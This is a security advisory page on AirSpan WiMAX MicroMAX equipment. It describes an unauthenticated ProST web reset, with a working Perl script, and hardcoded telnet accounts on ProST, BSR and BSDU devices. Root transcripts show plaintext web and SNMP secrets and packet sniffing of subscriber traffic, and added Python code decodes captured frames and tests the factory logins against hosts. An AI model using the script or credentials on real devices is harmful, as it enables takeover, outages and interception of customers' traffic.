AirSpan WiMAX MicroMAX
vulnerability reports
  • ProST web access authentication bypass (publication date 8.03.2008)
    • A remote, unauthenticated attacker can reach the ProST web interface and make arbitrary changes to its configuration; the script below, for example, resets a device to factory defaults without ever logging in.
      #!/usr/bin/perl -w
      ########################################
      #                                      #
      #  US-CERT VU#248372, example          #
      #  by Arthur Lashin                    #
      #  diriger@gmail.com                   #
      #                                      #
      ########################################
      use strict;
      use LWP::UserAgent;

      # Usage: prost_reset.pl <prost_ip>
      unless (defined $ARGV[0]) {
          die "\nUsage: $0 prost_ip\n\n";
      }

      my $ip = $ARGV[0];
      prost_reset_to_default($ip);

      # Submits the "reset to default" form to /process_adv/ with no prior
      # authentication; a vulnerable ProST accepts it and wipes its configuration.
      sub prost_reset_to_default {
          my $ip = shift;
          my $timeout = 20;
          my $html_body = undef;

          my $ua = LWP::UserAgent->new;
          $ua->timeout($timeout);

          # Form fields as sent by the ProST "Advanced" web dialog.
          my %form = ('DialogText' => 'to+reset+to+default', 'Advanced' => 16);
          my $response = $ua->post('http://' . $ip . '/process_adv/', \%form);

          if ($response->is_success) {
              $html_body = $response->content;
              print $html_body;
          } else {
              print "Connect to $ip failed: " . $response->status_line . "\n";
          }
          return $html_body;
      }
    • Vulnerability fixed 9.03.2008 in ss-6.5.40.71.z

Base Station Distribution Unit (BSDU) backdoor (publication date 18.03.2008)

  • AirSpan BSDU has a serious security hole which lets anyone obtain remote root access to the device over an undocumented telnet service that is enabled by default. This is possible because all BSDUs share the same root password:
    [root@diriger]# telnet 192.168.1.254
    Trying 192.168.1.254...
    Connected to 192.168.1.254.
    Escape character is '^]'.

    bsdu-wimax login: root
    ~ # uname -ar
    Linux bsdu-wimax 2.6.16.19-default #31 PREEMPT Wed Oct 10 18:45:13 IST 2007 ppc unknown
    ~ #
    ~ # cd /root/shared/system
    /root/shared/system # ls -lF
    -rw-r--r--    1 root     root            4 Feb 26 08:17 activeBank
    -rw-r--r--    1 root     root          256 Feb 26 08:15 bank1metadata
    -rw-r--r--    1 root     root        27073 Feb 26 08:18 bank1verification
    -rw-r--r--    1 root     root          256 Sep  5  2007 bank2metadata
    -rw-r--r--    1 root     root        27073 Sep  6  2007 bank2verification
    -rw-r--r--    1 root     root          223 Mar 11 14:51 cfgsh.conf
    /root/shared/system #

    /root/shared/system # cat ./cfgsh.conf
    # WiMAX BSDU Configuration Shell config file
    ifconf static
    ip 192.168.1.254
    nmask 255.255.255.0
    gw 192.168.1.1
    ns 10.0.0.1
    sntps 10.0.0.2
    httplp admin,k5Rw2SDcTi
    snmproc w3E56G_0&
    snmprwc kY^$ds_*
    mvlan 15


    Here “k5Rw2SDcTi” is the web-access password (the httplp line holds user,password), and the snmproc and snmprwc lines appear to be the SNMP read-only and read-write community strings. Editing ./cfgsh.conf and rebooting the device applies the new settings, so root telnet access also means control of every other credential on the unit.

  • ProST telnet access - asmax:airspanmax

Example:

VxWorks login: asmax
Password: airspanmax

-> memShow
 status    bytes     blocks   avg block  max block
 ------ ---------- --------- ---------- ----------
current
   free     217876        56       3890     215928
  alloc    2611780      1807       1445          -
cumulative
  alloc  536676740   4823368        111          -
value = 0 = 0x0

-> plogStat
Plog status ( mask set 0x00000000,0x00000000 ) :
        < 0> ERROR                  [Off]
        < 1> WARN                   [Off]
        < 2> INFO                   [Off]
        < 3> CS                     [Off]
        < 4> ARM0_APPL_TASK         [Off]
        < 5> CNFG                   [Off]
        < 6> ExecLoop               [Off]
        < 7> MPA                    [Off]
        < 8> MPDU                   [Off]
        < 9> BRST                   [Off]
        <10> Framing (maps)         [Off]
        <11> DCD & UCD              [Off]
        <12> Connection             [Off]
        <13> Network Entry          [Off]
        <14> Ranging                [Off]
        <15> SBC                    [Off]
        <16> Link Maintenance       [Off]
        <17> Contention             [Off]
        <18> Link Manager           [Off]
        <19> LED ctrl               [Off]
        <20> Channel Reports        [Off]
        <21> IP Connectivity        [Off]
        <22> Registration           [Off]
        <23> Tx Scedular            [Off]
        <24> Management Msg         [Off]
        <25> MRCM                   [Off]
        <26> PKM                    [Off]
        <27> CRC & HCS Error        [Off]
        <28> RSSI & SNR             [Off]
        <29> BW Req & UL Alloc      [Off]
        <30> LED_PLUG               [Off]
        <31> DL Sync                [Off]
        <32> ARQ                    [Off]
        <33> ARQ RX                 [Off]
        <34> ARQ TX                 [Off]
        <35> WIFI Keep Alive        [Off]
        <36> DFS                    [Off]
        <37> FLASH                  [Off]
        <38> RF Drivers             [Off]
        <39> WEB                    [Off]
        <40> MIB                    [Off]
        <41> Home BS                [Off]
        <42> Misc                   [Off]
value = 43 = 0x2b = '+'
-> plogOn 28
value = 0 = 0x0

462053292 A1[\mrcm.c,716]FCH 15792087: RSSI -155[dBm/10] (-660 at ant), SNR 312[dB/10], TimeOff 0[Smpl], FreqOff -674[Hz]
462053302 A1[\mrcm.c,716]FCH 15792088: RSSI -155[dBm/10] (-660 at ant), SNR 311[dB/10], TimeOff 0[Smpl], FreqOff -709[Hz]
462053312 A1[\mrcm.c,716]FCH 15792089: RSSI -155[dBm/10] (-660 at ant), SNR 322[dB/10], TimeOff 0[Smpl], FreqOff -715[Hz]
462053322 A1[\mrcm.c,716]FCH 15792090: RSSI -155[dBm/10] (-660 at ant), SNR 317[dB/10], TimeOff 0[Smpl], FreqOff -1067[Hz]
-> plogOff 28
value = 0 = 0x0

/* tcpdump like commands, parameter = packet number */

-> sniffFromAir 5

... skipped ...

-> sniffFromEth 10
... skipped ...

-> NVM_ef_Set2Default   ### use this command to reset ProST to default ### 

  • MicroMAX BSR telnet access - Admin:airspansoc

Example:

VxWorks login: Admin
Password: airspansoc

-> cmd "Start"
value = 0 = 0x0
-> tShell task deleted
No entry for terminal type "dumb";
using dumb terminal settings.
bs>: help

... skipped ...

bs>: VLAN::showGlobalConfiguration
Global Vlan Bridge Information
==============================
  Bridge Mode
    Bridge Mode             : Vlan Bridge
  Reserved Vlans
    Reserved Vlan (1)       : 4090
    Reserved Vlan (2)       : 4091
    Reserved Vlan (3)       : 4092
  Management Vlan
    Management Vlan         : 160
  Q-in-Q Configuration
    Q-in-Q mode             : disabled
    S-Tag Ether Type        : 0x9100
    S-Tag Pvid              : 0
    S-Tag Priority          : 0
    S-Tag config mode       : by SS
    S-Tag use priority from : C-Tag(inner)

bs>: showsniffer
SNIFFER
=======
    state : disabled
    no rules

bs>: createsnifferfilter direction=rx mac-filter=+112233445566 type=mac

bs>: createsnifferfilter direction=rx type=data

bs>: showsniffer
SNIFFER
=======
    state : disabled
  RULE id=14
    rx sniffed   : YES
    tx sniffed   : NO
    data sniffed : YES
    error  type  : ONLY VALID
    mac  sniffed : NO

bs>: enablesniffer
Packet sniffing enabled

  INFO
    point                    : RTM
    date                     : 1528.350 s -
  PACKET DESCRIPTOR
    Descriptor address       : 0x0e808344
    Actions                  : 0x00000000
    DL pointer               : 0x0ca2a420
    Rx errors                : 0x00000000
    Encryption               : no
    KSN                      : 0
    Packet type              : 0x00000046
      Raw                    : no
      Wimax                  : yes
      Ethernet               : Basic Dix
      VLAN                   : no
      IP                     : IP v4
      L4                     : no
    BWR / GSH value          : 0
    PHSi                     : No
    CID                      : 0x00000202
    Length                   : 60
    Stuffing                 : 0
    Burst/Stat number        : 162
    Mac message type         : 0x00000000
    802.16 infos             : 0x00000010
    Dest Address             : 0x00000015622ef3f0
    Dest Hash                : 0x00001238
    Src Address              : 0x000000a00ac49b32
    Src Hash                 : 0x00009c62
    Ip header address        : 0x0cfd45dc
    Valid bit (not accurate) : Sw
  DATA LINK
    Link address             : 0x0e808384
    Next link                : 0x00000000
    Buffer @                 : 0x0cfd45c0
    Type                     : 128
    Offset                   : 14
    Payload len              : 60
    Buffer len               : 1610
    Payload address          : 0x0cfd45c0
  PAYLOAD
    F3 F0 00 A0  0A C4 9B 32  81 00 00 10  08 00 45 00
    00 20 00 F0  00 00 40 01  2C 6E C0 A8  81 D5 0A 01
    01 01 00 00  D3 03 C4 07  13 56 7D AD  D7 F0 00 00
    00 00 00 00  00 00 00 00  00 00 00 00
  INFO
    point                    : RTM
    date                     : 1531.130 s -
  PACKET DESCRIPTOR
    Descriptor address       : 0x0e8089b8
    Actions                  : 0x00000000
    DL pointer               : 0x0ca2a420
    Rx errors                : 0x00000000
    Encryption               : no
    KSN                      : 0
    Packet type              : 0x00000026
      Raw                    : no
      Wimax                  : yes
      Ethernet               : Basic Dix
      VLAN                   : yes
      IP                     : No
      L4                     : no
    BWR / GSH value          : 0
    PHSi                     : No
    CID                      : 0x00000204
    Length                   : 64
    Stuffing                 : 0
    Burst/Stat number        : 210
    Mac message type         : 0x00000000
    802.16 infos             : 0x00000010
    Dest Address             : 0x00000015622ef3f0
    Dest Hash                : 0x00001238
    Src Address              : 0x000000235e216f3a
    Src Hash                 : 0x00009701
    Ip header address        : 0x00000000
    Valid bit (not accurate) : Sw
  DATA LINK
    Link address             : 0x0e8089f8
    Next link                : 0x00000000
    Buffer @                 : 0x0d001740
    Type                     : 128
    Offset                   : 14
    Payload len              : 64
    Buffer len               : 1610
    Payload address          : 0x0d001740
  PAYLOAD
    00 15 62 2E  F3 F0 00 23  5E 21 6F 3A  81 00 00 1F
    08 06 00 01  08 00 06 04  00 02 00 23  5E 21 6F 3A
    0A 1E 03 86  00 15 62 2E  F3 F0 0A 1E  03 85 00 00
    00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00
bs>: disablesniffer
Packet sniffing disabled
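The two PAYLOAD dumps printed by the BSR sniffer above are raw Ethernet frames taken from the subscriber side, with "Encryption : no". The decoder below is an added example, not Airspan code and not part of the original report: it parses Ethernet II, an optional 802.1Q tag, ARP, IPv4 and ICMP and verifies the IPv4 header checksum, so it shows concretely what the undocumented sniffer hands to anyone holding the factory telnet password. The second frame is used verbatim. The first frame's dump as printed begins at "F3 F0", the tail of the sniffer's own Dest Address field 0x00000015622ef3f0 (the next six bytes are exactly the printed Src Address), so the leading "00 15 62 2E" is prepended from that field; that prefix is my reconstruction, and the IPv4 checksum check confirms the header lands where it should.

```python
"""Decode the BSR sniffer PAYLOAD dumps (added example, not Airspan code)."""
import struct

# Second frame, copied verbatim from the `enablesniffer` output above.
FRAME_ARP_REPLY = """
00 15 62 2E  F3 F0 00 23  5E 21 6F 3A  81 00 00 1F
08 06 00 01  08 00 06 04  00 02 00 23  5E 21 6F 3A
0A 1E 03 86  00 15 62 2E  F3 F0 0A 1E  03 85 00 00
00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00
"""
# First frame. The printed dump starts at "F3 F0", the tail of the sniffer's
# Dest Address 0x00000015622ef3f0, so "00 15 62 2E" is prepended here from that
# field (my reconstruction, not something the device printed).
FRAME_ICMP_REPLY = "00 15 62 2E " + """
F3 F0 00 A0  0A C4 9B 32  81 00 00 10  08 00 45 00
00 20 00 F0  00 00 40 01  2C 6E C0 A8  81 D5 0A 01
01 01 00 00  D3 03 C4 07  13 56 7D AD  D7 F0 00 00
00 00 00 00  00 00 00 00  00 00 00 00
"""

def hexdump_to_bytes(dump):
    """Turn the sniffer's space-separated hex dump into bytes."""
    return bytes.fromhex("".join(dump.split()))

def mac(b):
    return ":".join(f"{x:02x}" for x in b)

def ip4(b):
    return ".".join(str(x) for x in b)

def ipv4_checksum_ok(hdr):
    """RFC 791: the one's-complement sum over the whole header folds to 0xFFFF."""
    total = sum(struct.unpack("!%dH" % (len(hdr) // 2), hdr))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total == 0xFFFF

def decode_frame(raw):
    """Return a dict of the headers found in one Ethernet frame."""
    out = {"dst_mac": mac(raw[0:6]), "src_mac": mac(raw[6:12])}
    off = 12
    ethertype, = struct.unpack("!H", raw[off:off + 2])
    if ethertype == 0x8100:                               # 802.1Q tag
        tci, ethertype = struct.unpack("!HH", raw[off + 2:off + 6])
        out["vlan_id"], out["vlan_pcp"] = tci & 0x0FFF, tci >> 13
        off += 6
    else:
        off += 2
    out["ethertype"] = ethertype
    if ethertype == 0x0806:                               # ARP
        _, _, hlen, plen, oper = struct.unpack("!HHBBH", raw[off:off + 8])
        p = off + 8
        out["arp"] = {
            "op": {1: "request", 2: "reply"}.get(oper, oper),
            "sender_mac": mac(raw[p:p + hlen]),
            "sender_ip": ip4(raw[p + hlen:p + hlen + plen]),
            "target_mac": mac(raw[p + hlen + plen:p + 2 * hlen + plen]),
            "target_ip": ip4(raw[p + 2 * hlen + plen:p + 2 * hlen + 2 * plen]),
        }
    elif ethertype == 0x0800:                             # IPv4
        ihl = (raw[off] & 0x0F) * 4
        total_len, = struct.unpack("!H", raw[off + 2:off + 4])
        out["ipv4"] = {
            "src": ip4(raw[off + 12:off + 16]),
            "dst": ip4(raw[off + 16:off + 20]),
            "ttl": raw[off + 8],
            "proto": raw[off + 9],
            "total_len": total_len,
            "checksum_ok": ipv4_checksum_ok(raw[off:off + ihl]),
        }
        if raw[off + 9] == 1:                             # ICMP
            i = off + ihl
            out["icmp"] = {"type": raw[i], "code": raw[i + 1]}
    return out

def decode_dump(dump):
    """Decode one sniffer PAYLOAD dump string."""
    return decode_frame(hexdump_to_bytes(dump))

if __name__ == "__main__":
    import pprint
    pprint.pprint(decode_dump(FRAME_ICMP_REPLY))
    pprint.pprint(decode_dump(FRAME_ARP_REPLY))
```

Decoded, the first frame is an ICMP echo reply from 192.168.129.213 to 10.1.1.1 on VLAN 16 and the second an ARP reply for 10.30.3.134 answering 10.30.3.133 on VLAN 31, neither of them on the management VLAN 160 shown by VLAN::showGlobalConfiguration: the sniffer reads customer traffic, not just the base station's own.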

  • MicroMAX BSR telnet access - root:asmaxroot
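A fleet check for the factory telnet accounts listed in this report, added here as an example; it is not part of the original advisory or of Airspan's software. It assumes the login dialogue seen in the transcripts above (a "login:" prompt, a "Password:" prompt, then a "-> " or "# " shell prompt on success), and it strips rather than answers telnet option negotiation, which is an assumption about how tolerant the VxWorks and BusyBox login prompts are. The BSDU root account is not in the list because the page shows no password for it. The fake device the script can start on localhost is a constructed stand-in so the sweep runs offline; against real equipment call audit_host(ip) on port 23.

```python
"""Sweep a host for the factory telnet accounts documented on this page
(added example, not Airspan code)."""
import socket
import threading

# Accounts documented on this page (product, user, password).
DOCUMENTED_ACCOUNTS = [
    ("ProST", "asmax", "airspanmax"),
    ("MicroMAX BSR", "Admin", "airspansoc"),
    ("MicroMAX BSR", "root", "asmaxroot"),
]
# Shell prompts seen in the transcripts: VxWorks "-> " and the BSDU "~ # ".
# "# " is matched only after the password is sent, so banner text such as
# "#31 PREEMPT" in uname output cannot trigger it.
SHELL_PROMPTS = (b"-> ", b"# ")

def strip_iac(data):
    """Drop 3-byte telnet IAC sequences (0xFF cmd opt) so prompt matching sees text.
    Assumption: the devices only send WILL/WONT/DO/DONT, not sub-negotiation."""
    out, i = bytearray(), 0
    while i < len(data):
        if data[i] == 0xFF and i + 2 < len(data):
            i += 3
        else:
            out.append(data[i])
            i += 1
    return bytes(out)

def read_until(sock, markers, timeout=5.0):
    """Read until one of `markers` appears (case-insensitive) or the peer closes.
    Returns (buffer, matched_marker_or_None)."""
    sock.settimeout(timeout)
    buf = b""
    while True:
        try:
            chunk = sock.recv(1024)
        except socket.timeout:
            return buf, None
        if not chunk:
            return buf, None
        buf += strip_iac(chunk)
        for m in markers:
            if m.lower() in buf.lower():
                return buf, m

def try_login(host, port, user, password, timeout=5.0):
    """True if user/password yields a shell prompt on host:port."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if read_until(s, (b"login:",), timeout)[1] is None:
            return False
        s.sendall(user.encode() + b"\r\n")
        if read_until(s, (b"password:",), timeout)[1] is None:
            return False
        s.sendall(password.encode() + b"\r\n")
        _, m = read_until(s, SHELL_PROMPTS + (b"incorrect", b"login:"), timeout)
        return m in SHELL_PROMPTS

def audit_host(host, port=23, accounts=DOCUMENTED_ACCOUNTS):
    """Return the (product, user, password) triples that still log in on host."""
    hits = []
    for product, user, password in accounts:
        try:
            if try_login(host, port, user, password):
                hits.append((product, user, password))
        except OSError:
            break        # unreachable or port closed: nothing more to learn
    return hits

def serve_fake_device(valid_user, valid_password, banner=b"\r\nVxWorks login: "):
    """Constructed stand-in for a device login, bound on 127.0.0.1; returns the
    port. One account is accepted, anything else gets 'Login incorrect'."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def handle(conn):
        with conn:
            conn.sendall(banner)
            user = conn.recv(256).strip()
            conn.sendall(b"Password: ")
            pw = conn.recv(256).strip()
            if (user, pw) == (valid_user.encode(), valid_password.encode()):
                conn.sendall(b"\r\n-> ")
            else:
                conn.sendall(b"\r\nLogin incorrect\r\n")

    def loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=handle, args=(conn,), daemon=True).start()

    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]

if __name__ == "__main__":
    port = serve_fake_device("Admin", "airspansoc")
    print(audit_host("127.0.0.1", port))
```

A non-empty result means the unit still carries a factory account and should be taken off any network reachable by subscribers until the password is changed or the service disabled; the BSDU's cfgsh.conf shows that the same root access also exposes the web and SNMP secrets, so rotate those too.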